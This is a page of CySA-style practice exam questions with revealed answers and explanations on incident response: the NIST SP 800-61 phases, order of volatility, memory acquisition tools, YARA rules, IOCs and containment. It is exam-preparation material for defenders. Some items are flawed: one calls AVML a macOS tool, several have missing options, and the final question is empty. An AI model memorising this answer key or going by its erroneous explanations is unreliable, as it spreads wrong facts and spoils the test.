CCNA Cysa Incident Response Questions

75 of 109 questions · Page 1/2 · Cysa Incident Response topic · Answers revealed

1
MCQmedium

When performing digital forensics, which of the following represents the correct order of volatility from most volatile to least volatile?

A.RAM, CPU registers, disk, swap, logs, archived media
B.Swap, RAM, CPU registers, disk, logs, archived media
C.Archived media, logs, disk, swap, RAM, CPU registers
D.CPU registers, RAM, swap, disk, logs, archived media
AnswerD

This is the standard order of volatility.

Why this answer

The order of volatility dictates that evidence should be collected from most volatile to least volatile to avoid losing transient data. CPU registers are the most volatile, followed by RAM, swap, disk, logs, and archived media.

2
Multi-Selectmedium

After a phishing incident, the security team wants to improve detection of similar attacks in the future. Which THREE actions should the team take as part of post-incident activity? (Choose THREE.)

Select 3 answers
A.Disabling user accounts that clicked the phishing link
B.Updating email filtering rules and detection signatures
C.Sharing indicators of compromise with other organizations via a threat intelligence platform
D.Conducting a lessons learned meeting to identify process improvements
E.Reimaging all affected workstations
AnswersB, C, D

This improves future detection of similar phishing emails.

Why this answer

Post-incident activities include updating detection rules, sharing IOCs, and conducting lessons learned to improve processes. Reimaging is recovery, and disabling accounts is containment.

3
MCQhard

During forensic analysis of a compromised Linux server, an analyst needs to acquire memory evidence. The server is running and the analyst has root access. Which of the following tools should the analyst use to capture the contents of RAM with the least impact on the system?

A.WinPmem
B.FTK Imager
C.dd if=/dev/mem of=mem.dump
D.LiME
AnswerD

LiME is specifically designed for Linux memory acquisition with minimal impact.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that dumps memory and is designed to minimize footprint. It is commonly used for Linux memory acquisition.

4
MCQmedium

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies an alert indicating a high volume of outbound traffic from a critical server to an unknown IP address. Which of the following actions should the analyst perform FIRST?

A.Correlate the alert with firewall logs and other security tools.
B.Notify law enforcement immediately.
C.Isolate the server from the network to prevent data exfiltration.
D.Rebuild the server from a known good backup.
AnswerA

Correlation helps validate the incident and gather more evidence.

Why this answer

According to NIST SP 800-61, during detection and analysis, the first step is to determine if an incident has occurred. Correlating the alert with other sources helps validate the incident and reduce false positives.

5
MCQhard

During a DDoS attack, the incident response team notices that the attack traffic originates from multiple IP addresses across different countries. The team decides to implement a long-term containment strategy. Which action is MOST appropriate for long-term containment?

A.Block the source IPs on the firewall.
B.Increase server bandwidth to absorb the traffic.
C.Implement BGP blackholing with the ISP.
D.Deploy additional load balancers.
AnswerC

BGP blackholing drops traffic to the targeted IP at the ISP level, mitigating DDoS.

Why this answer

Long-term containment focuses on preventing recurrence. Implementing BGP blackholing at the ISP level can mitigate future DDoS attacks by dropping traffic to the targeted IPs upstream.

6
MCQeasy

Which of the following is an example of a behavioral indicator of compromise (IOC) observed during dynamic malware analysis?

A.PE section names
B.File hash
C.Domain name
D.Outbound network connection to a known malicious IP
AnswerD

Correct. This is behavior observed during execution.

Why this answer

Dynamic analysis monitors behavior such as network connections, file system changes, and process creation.

7
MCQmedium

A security analyst is investigating a potential data breach. The analyst needs to preserve evidence before containment. Which of the following actions is MOST appropriate at this stage?

A.Powering off the system
B.Blocking the attacker's IP at the firewall
C.Disabling the user's account
D.Creating a forensic image of the hard drive
AnswerD

Correct. Imaging preserves the state of the disk for analysis.

Why this answer

Taking a forensic image of the affected system ensures evidence is preserved before any containment actions that could alter data.

8
MCQmedium

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which of the following is the most appropriate next step?

A.Notify law enforcement immediately.
B.Immediately isolate the host from the network.
C.Rebuild the host from a known good image.
D.Collect additional logs and perform a deeper analysis to confirm the compromise.
AnswerD

This aligns with the detection and analysis phase to validate the incident.

Why this answer

After detection, the analyst should collect additional data to confirm the incident and scope the impact before proceeding to containment.

9
Multi-Selecteasy

During a post-incident review, a security analyst identifies that the mean time to detect (MTTD) for incidents is significantly higher than the industry benchmark. Which THREE actions should the analyst recommend to improve detection capabilities?

Select 3 answers
A.Implement additional network monitoring sensors.
B.Enhance SIEM correlation rules based on current threat intelligence.
C.Subscribe to threat intelligence feeds to enrich alerts.
D.Increase the frequency of vulnerability scans.
E.Reduce the retention period for logs.
AnswersA, B, C

More sensors improve visibility and reduce blind spots.

Why this answer

Updating detection rules, integrating threat intelligence, and improving monitoring coverage directly reduce detection time.

10
MCQmedium

During the detection and analysis phase of an incident, an analyst identifies a file with a hash that matches a known malware signature. The analyst wants to enrich this IOC with additional context. Which resource is BEST suited for this enrichment?

A.Shodan
B.WHOIS lookup
C.VirusTotal
D.Passive DNS
AnswerC

VirusTotal provides threat intelligence enrichment for file hashes.

Why this answer

VirusTotal aggregates antivirus scan results and provides additional context such as file metadata, behavior, and community comments.

11
MCQmedium

A security operations center (SOC) analyst receives an alert about a potential ransomware infection on a critical server. The incident response team needs to contain the threat quickly. Which of the following should be performed FIRST as a short-term containment measure?

A.Disable the user account associated with the alert
B.Run a full antivirus scan on the server
C.Isolate the affected network segment
D.Rebuild the server from a clean backup
AnswerC

Network isolation is a key short-term containment strategy to stop lateral movement.

Why this answer

Short-term containment focuses on immediate isolation to prevent further damage. Isolating the affected network segment stops the ransomware from spreading to other systems.

12
MCQmedium

After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?

A.The creation timestamp of the file
B.The file size of the executable
C.The packer used to obfuscate the executable
D.The import table showing API calls like WriteProcessMemory and CreateRemoteThread
AnswerD

Common API calls used for injection are good indicators for YARA rules.

Why this answer

Import table analysis reveals API calls and DLLs used by the malware, which are often consistent across variants and useful for detection.

13
Multi-Selecthard

During a forensic investigation, an analyst must acquire digital evidence while maintaining forensic soundness. Which THREE practices should the analyst follow? (Choose three.)

Select 3 answers
A.Use the suspect's operating system to copy files
B.Power on the system to capture volatile data first
C.Verify the hash of the image against the original
D.Use a write blocker when imaging the hard drive
E.Document every action taken during the acquisition
AnswersC, D, E

Correct. Hash verification ensures integrity.

Why this answer

Write blockers prevent modification, hash verification ensures integrity, and proper documentation maintains chain of custody.

14
Multi-Selectmedium

A security analyst is responding to a potential data exfiltration incident. As part of the containment strategy, the analyst must preserve evidence. Which TWO actions should the analyst take before containment? (Select two.)

Select 2 answers
A.Capture a forensic image of the affected systems
B.Change passwords for affected accounts
C.Disconnect the system from the network
D.Record current active network connections
E.Kill malicious processes
AnswersA, D

Imaging preserves disk state for analysis.

Why this answer

Forensic imaging of the affected systems captures the state before containment actions alter it. Recording current network connections captures volatile evidence that may be lost when the system is isolated.

15
MCQmedium

An incident responder needs to collect memory from a Linux system during an incident. Which tool should the responder use?

A.LiME
B.avml
C.WinPmem
D.FTK Imager
AnswerA

LiME is a popular tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is the correct tool because it is specifically designed to capture volatile memory from Linux systems, loading as a kernel module to safely dump RAM contents. During incident response, memory acquisition must be performed with minimal system interference, and LiME supports both raw and compressed output formats suitable for analysis with tools like Volatility.

Exam trap

Cisco often tests the distinction between operating-system-specific memory acquisition tools, and the trap here is that candidates may confuse AVML (macOS) or WinPmem (Windows) as cross-platform tools, or mistakenly think FTK Imager can capture Linux memory when it is primarily a disk imager.

How to eliminate wrong answers

Option B (avml) is wrong because it is a memory acquisition tool for macOS, not Linux. Option C (WinPmem) is wrong because it is a Windows memory acquisition tool, part of the Rekall framework, and does not run on Linux. Option D (FTK Imager) is wrong because it is a forensic imaging tool primarily for disk acquisition on Windows systems, not designed for Linux memory capture.

16
MCQeasy

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?

A.Search for the IP address on VirusTotal and Shodan.
B.Correlate the alert with other logs and endpoint data to confirm malicious activity.
C.Escalate the alert to the incident response team for containment.
D.Contain the host immediately by disconnecting it from the network.
AnswerB

Correlation helps validate the alert before taking action.

Why this answer

Option B is correct because during the detection and analysis phase, the primary goal is to validate the alert by correlating it with additional data sources (e.g., firewall logs, DNS logs, endpoint detection and response (EDR) telemetry) to confirm whether the traffic is truly malicious or a false positive. Simply searching external threat intelligence (Option A) provides context but does not confirm activity on the host; escalation (Option C) and containment (Option D) are premature without validated evidence.

Exam trap

Cisco often tests the misconception that external threat intelligence alone (Option A) is sufficient for validation, when in fact the NIST framework emphasizes internal log correlation to confirm malicious activity before taking further action.

How to eliminate wrong answers

Option A is wrong because searching VirusTotal and Shodan only provides external reputation data and does not validate whether the internal host actually communicated with the IP or if the traffic was benign (e.g., a false positive from a misconfigured proxy). Option C is wrong because escalation to the incident response team should occur only after the alert has been validated through correlation; premature escalation wastes resources and may lead to unnecessary incident handling. Option D is wrong because immediate containment (e.g., disconnecting the host) is a reactive step that should follow validation and a formal incident declaration; acting without confirmation can disrupt legitimate business operations and violate the NIST SP 800-61 containment strategy.

17
Multi-Selecthard

A CSIRT is investigating a ransomware incident that encrypted files on multiple servers. The team needs to determine the initial infection vector. Which THREE pieces of evidence should the team prioritize collecting? (Select three.)

Select 3 answers
A.Email gateway logs for the week prior to the incident
B.Endpoint detection and response (EDR) logs from affected servers
C.Network traffic logs from the perimeter firewall
D.Physical access logs to the data center
E.Firewall configuration backups
AnswersA, B, C

Email logs may show phishing emails that delivered the ransomware.

Why this answer

Email logs can reveal phishing attachments or links. Endpoint logs may show process execution or downloads. Network logs can identify C2 communication or lateral movement.

These three together help trace the initial entry.

18
MCQmedium

A security analyst is conducting static analysis of a suspicious executable. Which of the following tools or techniques is BEST suited for extracting strings and viewing the import table?

A.LiME
B.FTK Imager
C.Cuckoo Sandbox
D.PEview or CFF Explorer
AnswerD

These tools are designed for static analysis of PE files, including viewing imports and strings.

Why this answer

Static analysis often involves examining the PE header, imports, and strings. Tools like PEview, CFF Explorer, or simply using 'strings' command can extract readable strings. The import table shows DLLs and functions the executable uses.

19
MCQmedium

After containing a security incident, the incident response team conducts a root cause analysis. Which of the following is the PRIMARY purpose of this activity?

A.To identify the initial attack vector
B.To calculate the financial loss
C.To document the timeline
D.To assign blame to individuals
AnswerA

Root cause analysis determines how the incident started, allowing for preventive measures.

Why this answer

Root cause analysis aims to identify the underlying cause of the incident to prevent recurrence. It is a key part of post-incident activity.

20
MCQmedium

After a DDoS attack, the incident response team wants to improve detection and prevention. Which of the following metrics would be MOST useful for evaluating the effectiveness of the response?

A.Mean Time to Respond (MTTR)
B.Number of false positives
C.Mean Time to Detect (MTTD)
D.Incidents per week
AnswerA

MTTR measures how quickly the team responds and mitigates incidents, reflecting response effectiveness.

Why this answer

Mean Time to Respond (MTTR) measures the average time taken to respond to incidents, which is a key metric for evaluating response effectiveness.

21
Multi-Selecthard

During a malware outbreak, an incident responder uses YARA rules to detect similar malware across the environment. The responder created a custom YARA rule based on static analysis of the malware sample. Which THREE elements are MOST useful for creating an effective YARA rule for this malware? (Choose THREE.)

Select 3 answers
A.Unique strings found in the malware binary
B.The file size of the malware sample
C.Behavior observed in a sandbox, such as registry changes
D.PE header characteristics such as section names and entry point
E.Metadata such as the compile timestamp and file description
AnswersA, D, E

Strings like IP addresses or unique messages are key indicators.

Why this answer

YARA rules commonly use strings, PE header characteristics, and file metadata. File size and dynamic behavior are not used in static YARA rules.

22
MCQmedium

An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?

A.Reboot the server to clear the ransomware from memory.
B.Disconnect the server from the network.
C.Kill the ransomware process using task manager.
D.Create a full disk image of the server before any action.
AnswerB

Network isolation is a short-term containment step that halts communication and further damage.

Why this answer

Isolating the network connection prevents lateral movement and further encryption while preserving evidence for forensic analysis.

23
MCQmedium

A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?

A.Create a YARA rule based on hash characteristics.
B.Run the file in a sandbox and observe behavior.
C.Extract strings from the file.
D.Analyze the PE header and import table.
AnswerD

The PE header contains the import table, which lists DLLs and functions the file uses.

Why this answer

Analyzing the import table reveals which Windows API functions the file uses, providing insight into its functionality (e.g., network, file, or registry operations).

24
Multi-Selecthard

During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE)

Select 3 answers
A.Documenting the chain of custody for each drive
B.Using the fastest available imaging method without verification
C.Computing and verifying hashes (e.g., SHA-256) of the original and the image
D.Using a hardware write blocker to prevent writes to the source drive
E.Acquiring the image while the system is running (live acquisition)
AnswersA, C, D

Chain of custody documents who handled the evidence and when.

Why this answer

Forensic soundness requires maintaining evidence integrity. Using a verified write blocker prevents alteration. Hashing the original and copy ensures integrity.

Documenting the chain of custody maintains accountability.

25
MCQeasy

An analyst receives an alert about a user account that has been locked out multiple times within an hour. The account belongs to a system administrator. Which incident category does this scenario most likely fall under?

A.Insider threat
B.DDoS
C.Ransomware
D.Phishing
AnswerA

Abnormal account activity could indicate an insider threat or compromised credentials.

Why this answer

A system administrator account being locked out multiple times in an hour suggests a deliberate attempt to guess or brute-force the credentials, or the admin themselves may be performing unauthorized actions that trigger lockout policies. This aligns with an insider threat because the account has elevated privileges and the anomalous lockout pattern indicates either a compromised credential or malicious insider activity, not an external network-based attack.

Exam trap

Cisco often tests the distinction between the attack vector (e.g., phishing) and the resulting incident category (e.g., insider threat), so candidates may incorrectly choose phishing because they focus on how credentials were stolen rather than the behavioral indicator of the lockout itself.

How to eliminate wrong answers

Option B (DDoS) is wrong because a Distributed Denial-of-Service attack targets network bandwidth or application availability, not individual user account lockouts; account lockouts are caused by repeated failed authentication attempts, not traffic floods. Option C (Ransomware) is wrong because ransomware typically involves file encryption and ransom demands, not repeated account lockouts; lockouts could be a side effect of a ransomware attack but are not the primary incident category. Option D (Phishing) is wrong because phishing is a social engineering technique to steal credentials, not the direct cause of multiple lockouts; while a phished credential could lead to lockouts, the scenario describes the lockout event itself, which is an insider threat indicator.

26
MCQhard

A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?

A.The file injects code into a legitimate process
B.The file opens and overwrites documents with a new extension and drops a ransom note
C.The file creates a registry run key
D.The file attempts to connect to multiple external IPs
AnswerB

Overwriting files and dropping a ransom note are classic ransomware behaviors.

Why this answer

Ransomware typically encrypts files and renames them with a new extension. Dropping a ransom note and leaving encrypted files is characteristic.

27
MCQeasy

An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?

A.Containment, Eradication, and Recovery
B.Detection and Analysis
C.Preparation
D.Post-Incident Activity
AnswerC

Preparation includes all readiness activities before an incident occurs.

Why this answer

Preparation involves all proactive measures to enable effective incident response, including policy, team, and tool readiness.

28
Multi-Selectmedium

A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)

Select 2 answers
A.Run a full antivirus scan on the system.
B.Delete any malicious files found during the investigation.
C.Verify the hash of the acquired image against the original.
D.Use a write blocker when imaging the hard drive.
E.Connect the suspect drive to a forensic workstation without a write blocker.
AnswersC, D

Hash verification ensures the image is an exact copy.

Why this answer

Write blockers prevent modification of the original media during acquisition, and hash verification ensures the integrity of the acquired image by comparing hashes.

29
Multi-Selecteasy

An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)

Select 2 answers
A.The number of users reporting the issue.
B.The potential business impact of the incident.
C.The criticality of the affected systems or data.
D.The time of day the incident occurred.
E.The type of threat actor involved.
AnswersB, C

Higher business impact leads to higher priority.

Why this answer

Priority is often based on the criticality of the affected assets and the potential business impact, as these determine how quickly the incident needs to be addressed.

30
MCQmedium

An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?

A.The malware's file size.
B.The date the malware was first seen.
C.A unique string within the malware.
D.The malware's MD5 hash.
AnswerC

Unique strings are commonly used in YARA rules.

Why this answer

YARA rules are based on patterns in the file, such as strings and byte sequences. A unique string found in the malware sample can be used to create a rule that identifies the malware.

31
MCQhard

An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?

A.Increase the frequency of vulnerability scans.
B.Share IOCs with the industry ISAC.
C.Conduct a root cause analysis to determine the initial infection vector.
D.Reimage all affected servers from backups.
AnswerC

Root cause analysis is a key post-incident activity to identify and fix underlying weaknesses.

Why this answer

Root cause analysis identifies how the ransomware entered, allowing the organization to implement preventive controls like patching, access controls, or user training.

32
MCQmedium

An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensic sound procedure should the analyst perform?

A.Compare the hash of the image to the hash of the original drive.
B.Use a write blocker when acquiring the image.
C.Mount the image in read-only mode.
D.Analyze the image with a hex editor.
AnswerA

Hash comparison confirms that the image is an exact copy.

Why this answer

Hash verification ensures the image matches the original by comparing cryptographic hashes (e.g., MD5, SHA-256) generated during acquisition.

33
MCQeasy

An organization's security team receives a report of a potential insider threat. An employee is suspected of accessing sensitive files without authorization. Which incident category BEST describes this scenario?

A.Malware
B.Insider threat
C.Data breach
D.Ransomware
AnswerB

The scenario describes an employee acting maliciously or negligently, which is an insider threat.

Why this answer

An insider threat is a security risk originating from within the organization, often involving unauthorized access or data exfiltration by employees.

34
MCQmedium

During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?

A.Network indicator
B.File hash
C.Email indicator
D.Domain name
AnswerA

IP addresses are network-based indicators of compromise.

Why this answer

IP addresses are a common type of indicator of compromise, representing network-based IOCs that can be used for detection.

35
MCQeasy

Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?

A.Detection and Analysis
B.Post-Incident Activity
C.Preparation
D.Containment, Eradication, and Recovery
AnswerC

Preparation is the first phase.

Why this answer

The NIST SP 800-61 lifecycle begins with Preparation, which includes establishing policies, tools, and training before an incident occurs.

36
MCQmedium

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?

A.Percentage of incidents containing malware
B.Number of incidents per week
C.Mean time to respond (MTTR)
D.Mean time to detect (MTTD)
AnswerD

Reducing MTTD will help contain incidents earlier and reduce impact.

Why this answer

A high MTTD indicates the organization is not detecting incidents quickly enough, which increases dwell time and potential damage.

37
MCQhard

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for incidents is significantly higher than industry benchmarks. Which of the following improvements would most directly reduce MTTD?

A.Increasing the number of forensic analysts on call.
B.Conducting more frequent tabletop exercises.
C.Implementing automated alerting based on threat intelligence.
D.Rotating credentials after each incident.
AnswerC

Automated alerts reduce the time between compromise and detection.

Why this answer

MTTD is the average time to detect an incident. Implementing automated alerting and correlation rules from threat intelligence can speed up detection by reducing manual analysis time.

38
MCQeasy

An organization has identified indicators of compromise (IOCs) from a recent incident. Which data format is specifically designed for sharing threat intelligence in a standardized, machine-readable way?

A.PDF
B.CSV
D.STIX
AnswerD

Correct. STIX is a standardized language for threat intelligence.

Why this answer

STIX (Structured Threat Information Expression) is a language for sharing threat intelligence.

39
MCQmedium

During a post-incident review, the CSIRT identifies that the mean time to detect (MTTD) is significantly higher than the industry benchmark. Which initiative would MOST likely reduce MTTD?

A.Conducting more frequent tabletop exercises
B.Rotating credentials for all service accounts
C.Deploying additional endpoint detection and response (EDR) sensors
D.Implementing a new patch management process
AnswerC

Correct. More sensors improve visibility and reduce detection time.

Why this answer

Improving detection capabilities through enhanced monitoring and alerting reduces detection time.

40
MCQeasy

An analyst needs to capture the contents of volatile memory from a Windows system suspected of being compromised. Which tool should the analyst use to acquire a memory image?

A.WinPmem
B.LiME
C.FTK Imager
D.dd
AnswerA

WinPmem is a dedicated tool for acquiring memory from Windows systems.

Why this answer

WinPmem is a memory acquisition tool for Windows systems, capable of capturing RAM contents for analysis.

41
MCQhard

An analyst runs a YARA rule against a set of files and gets a hit. The rule was written to detect a specific malware family. What is the PRIMARY purpose of using YARA rules in this context?

A.To sandbox the malware for dynamic analysis
B.To identify files that match known malware characteristics
C.To verify the hash of the malware sample
D.To extract strings from the malware
AnswerB

Correct. YARA rules detect patterns indicative of malware.

Why this answer

YARA is a pattern-matching tool used to identify and classify malware samples based on textual or binary patterns.

42
MCQmedium

During a dynamic malware analysis session, a security analyst uses a sandbox to detonate a suspicious file. Which of the following observations would be considered a behavioral indicator of compromise (IOC)?

A.The file has a suspicious import table
B.The file's PE header indicates it is packed
C.The file creates a scheduled task
D.The file makes outbound connections to an unknown IP address
AnswerD

Outbound network connections are classic behavioral IOCs observed during dynamic analysis.

Why this answer

Behavioral IOCs include actions performed by the malware, such as network connections, file creation, or registry changes. Outbound connections to an unknown IP indicate command-and-control activity.

43
MCQhard

During a ransomware incident, the incident response team needs to preserve evidence before containment. Which of the following actions should be performed BEFORE isolating the infected system from the network?

A.Capture the contents of RAM.
B.Run an antivirus scan.
C.Disable the network interface.
D.Capture a forensic image of the hard drive.
AnswerA

RAM is volatile and must be captured before any changes to the system state.

Why this answer

The order of volatility requires capturing volatile data like RAM before shutting down or isolating the system, as isolation may alter or lose memory contents.

44
Multi-Selectmedium

A security analyst is investigating a potential malware infection on a Windows workstation. The analyst needs to collect evidence while preserving the order of volatility. Which TWO pieces of data should the analyst collect FIRST? (Select TWO)

Select 2 answers
A.System event logs
B.Contents of the hard drive
C.Registry hives
D.Contents of RAM
E.Running processes and network connections
AnswersD, E

RAM is highly volatile and must be captured before powering off.

Why this answer

According to the order of volatility, the most volatile data should be collected first. CPU registers and cache are at the top of the order, followed by routing table, ARP cache, process table, kernel statistics, and then memory. However, among the options, running processes (memory) and network connections are among the most volatile.

Typically, memory (RAM) is collected before disk data.

45
MCQhard

After containing a data breach, the incident response team discovers that an attacker exfiltrated sensitive data over DNS tunneling. Which of the following detection rules would BEST identify similar activity in the future?

A.An SIEM alert for any DNS query exceeding 100 bytes
B.A Snort rule blocking traffic to known malicious IPs
C.A firewall rule that blocks all DNS requests from internal servers
D.A YARA rule that flags DNS queries with high entropy domain names
AnswerD

High entropy in domain names is a common indicator of DNS tunneling.

Why this answer

DNS tunneling often involves unusual domain names with high entropy or long subdomains. A YARA rule targeting DNS query patterns can detect such anomalies.

46
MCQeasy

During which phase of the NIST SP 800-61 incident response lifecycle would an organization conduct a lessons learned meeting?

A.Containment, Eradication, and Recovery
B.Detection and Analysis
C.Post-Incident Activity
D.Preparation
AnswerC

Correct. This phase includes lessons learned and reporting.

Why this answer

The post-incident activity phase includes lessons learned, root cause analysis, and improvement actions.

47
MCQmedium

A security analyst detects ransomware on a critical server. Which containment strategy should be implemented FIRST to minimize damage?

A.Run a full antivirus scan on the server
B.Block the ransomware's command-and-control IP at the firewall
C.Rebuild the server from a clean backup
D.Disconnect the server from the network
AnswerD

Correct. Network isolation prevents further encryption of shared drives.

Why this answer

Immediate network isolation (short-term containment) stops lateral spread and limits damage.

48
Multi-Selecthard

A security analyst is investigating a potential data exfiltration incident. The analyst captures memory from a Windows system and finds a process that is injecting code into other processes. Which THREE indicators from the memory analysis would MOST strongly suggest malicious activity? (Select THREE.)

Select 3 answers
A.The process has memory regions with RWX permissions.
B.The process is hidden from the task manager.
C.The process is making calls to WriteProcessMemory and CreateRemoteThread.
D.The process name is a known Windows system process.
E.The process has a valid digital signature.
AnswersA, B, C

RWX memory is often used for injected shellcode.

Why this answer

Suspicious memory regions (like RWX), unusual API calls (e.g., WriteProcessMemory), and hidden processes are strong indicators of malware or code injection.

49
MCQeasy

A security analyst is classifying an incident where an employee's workstation is infected with ransomware that encrypts files and displays a ransom note. Which incident category and severity level best describe this scenario?

A.DDoS, low
B.Malware, moderate
C.Data breach, high
D.Insider threat, high
AnswerB

Ransomware is malware, and a single workstation infection without critical data impact is moderate.

Why this answer

Option B is correct because ransomware is a specific subtype of malware that encrypts files and demands payment, making 'Malware' the appropriate incident category. The severity is 'moderate' because while the infection impacts a single workstation and causes data loss, it does not immediately compromise the entire network or expose sensitive data at scale, aligning with typical moderate-severity criteria for isolated malware incidents.

Exam trap

Cisco often tests the distinction between 'Malware' and 'Data breach' by making candidates assume that file encryption automatically implies data exfiltration, but ransomware typically does not exfiltrate data unless it is a double-extortion variant.

How to eliminate wrong answers

Option A is wrong because a DDoS (Distributed Denial of Service) attack involves overwhelming a network or server with traffic to disrupt availability, not encrypting files on a single workstation; ransomware does not cause network-level flooding. Option C is wrong because a data breach requires unauthorized access or exfiltration of sensitive data, whereas ransomware here only encrypts local files without evidence of data theft or exposure. Option D is wrong because an insider threat involves malicious or negligent actions by an authorized user, but the scenario describes an external malware infection (ransomware) with no indication of employee intent or privilege misuse.

50
MCQeasy

A security analyst is reviewing indicators of compromise (IOCs) from a recent phishing campaign. Which of the following is an example of an email-related IOC?

A.Domain name in the URL
B.Suspicious sender email address
C.IP address of the sender's mail server
D.File hash of an attachment
AnswerB

Sender email address is a direct email indicator.

Why this answer

Email indicators of compromise include sender email addresses, subject lines, and attachment hashes. A suspicious sender address is a common IOC used to detect phishing.

51
MCQmedium

An incident responder needs to collect forensic evidence from a server that was attacked. The evidence includes network connections, running processes, memory contents, and disk data. According to the order of volatility, which piece of evidence should the responder collect FIRST?

A.Memory contents
B.Network connections
C.Running processes
D.Disk data
AnswerB

Network connections are highly volatile and can disappear quickly, so they are collected first.

Why this answer

The order of volatility dictates that the most volatile data (e.g., CPU registers, network connections) should be collected first. Network connections change rapidly.

52
MCQeasy

During the preparation phase of the NIST SP 800-61 incident response lifecycle, a security analyst is tasked with ensuring the team has the necessary tools and resources. Which of the following is the MOST important activity to perform during this phase?

A.Sharing indicators of compromise with threat intel platforms
B.Developing and testing incident response playbooks
C.Conducting root cause analysis of past incidents
D.Analyzing malware samples in a sandbox
AnswerB

Playbooks are essential for consistent and effective response; testing ensures they work.

Why this answer

The preparation phase focuses on establishing policies, procedures, and resources. Developing and testing incident response playbooks ensures the team is ready to handle incidents efficiently.

53
MCQeasy

An organization uses MISP as its threat intelligence platform. After a security incident, the team wants to share IOCs with other trusted organizations. Which standard should they use to package and exchange the threat intelligence?

B.NetFlow
D.STIX/TAXII
AnswerD

STIX/TAXII are the standard formats for threat intelligence exchange.

Why this answer

STIX (Structured Threat Information Expression) is the standard for describing threat intelligence, and TAXII is the protocol for sharing it.

54
Multi-Selectmedium

An incident response team is conducting post-incident activities after a ransomware attack. The team wants to improve detection and response for future incidents. Which TWO actions are most appropriate for updating detection rules? (Select TWO.)

Select 2 answers
A.Conduct a tabletop exercise for the incident response team.
B.Increase the frequency of vulnerability scans.
C.Create YARA rules to identify the ransomware file hashes and patterns.
D.Share IOCs with external threat intelligence platforms.
E.Update the SIEM correlation rules to detect the TTPs observed.
AnswersC, E

YARA rules can detect the malware based on characteristics.

Why this answer

Updating SIEM correlation rules based on the attack TTPs and creating YARA rules for the ransomware family will enhance detection of similar threats.

55
Multi-Selectmedium

A security analyst is performing incident response for a suspected malware outbreak. Which TWO actions are examples of long-term containment? (Select TWO.)

Select 2 answers
A.Apply security patches to all systems
B.Isolate the affected network segment
C.Disable compromised user accounts
D.Block malicious IPs at the firewall
E.Rebuild compromised systems from known good media
AnswersA, E

Patching addresses the root cause and prevents recurrence.

Why this answer

Long-term containment includes actions that permanently remediate the threat, such as patching vulnerabilities and rebuilding systems. Isolating the network is short-term.

56
MCQhard

An analyst is investigating a possible data exfiltration incident. The analyst has acquired a memory dump from the compromised system. Which of the following would be the BEST approach to extract evidence of exfiltration?

A.Calculating the MD5 hash of the memory dump and comparing it to known good hashes
B.Using a memory analysis framework like Volatility to analyze network connections and process memory
C.Searching the memory dump for strings containing 'password'
D.Rebooting the system and capturing a new memory dump
AnswerB

Volatility can recover network connections, sockets, and process memory that may contain exfiltrated data.

Why this answer

Memory analysis tools like Volatility can extract network connections, process memory, and other artifacts that may show exfiltration activity.

57
MCQmedium

During post-incident activities, the security team reviews metrics. Which metric measures the average time taken to detect an incident?

A.MTTR
B.SLA
C.RTO
D.MTTD
AnswerD

MTTD stands for Mean Time to Detect.

Why this answer

MTTD (Mean Time to Detect) measures detection efficiency. MTTR is for response/repair.

58
Multi-Selectmedium

During dynamic analysis of a suspicious file in a sandbox environment, which THREE behaviors are considered indicators of compromise (IOCs) that suggest malicious activity? (Choose THREE.)

Select 3 answers
A.Creating a registry run key to achieve persistence.
B.Outbound network connections to a known malicious IP.
C.The file reading its own content.
D.Dropping an executable file in the startup folder.
E.Opening a text file that was already present.
AnswersA, B, D

Persistence mechanisms are common in malware.

Why this answer

Dynamic analysis monitors behavior. Outbound connections to known bad IPs, creation of suspicious registry keys, and dropping files in startup folders are common malicious behaviors.

59
MCQmedium

During a phishing incident, an analyst extracts a URL from the email body and searches VirusTotal. The URL is associated with a credential harvesting page. Which type of indicator is this URL?

A.Indicator of Compromise (IOC)
B.Indicator of Attack (IOA)
C.Campaign
D.TTP
AnswerA

The URL is a specific artifact that indicates a compromise.

Why this answer

The URL is an observable that indicates malicious activity and can be used to detect and block further phishing attempts, making it an IOC.

60
Multi-Selectmedium

A security analyst is investigating a phishing incident that resulted in credential theft. Which TWO actions should the analyst take as part of short-term containment? (Choose two.)

Select 2 answers
A.Block the phishing domain at the email gateway
B.Rebuild the affected workstations from a clean image
C.Conduct a full vulnerability scan of the network
D.Change all user passwords in the domain
E.Disable the compromised user accounts
AnswersA, E

Correct. This prevents more users from clicking.

Why this answer

Short-term containment aims to stop the immediate threat. Disabling accounts and blocking malicious domains are quick containment actions.

61
MCQeasy

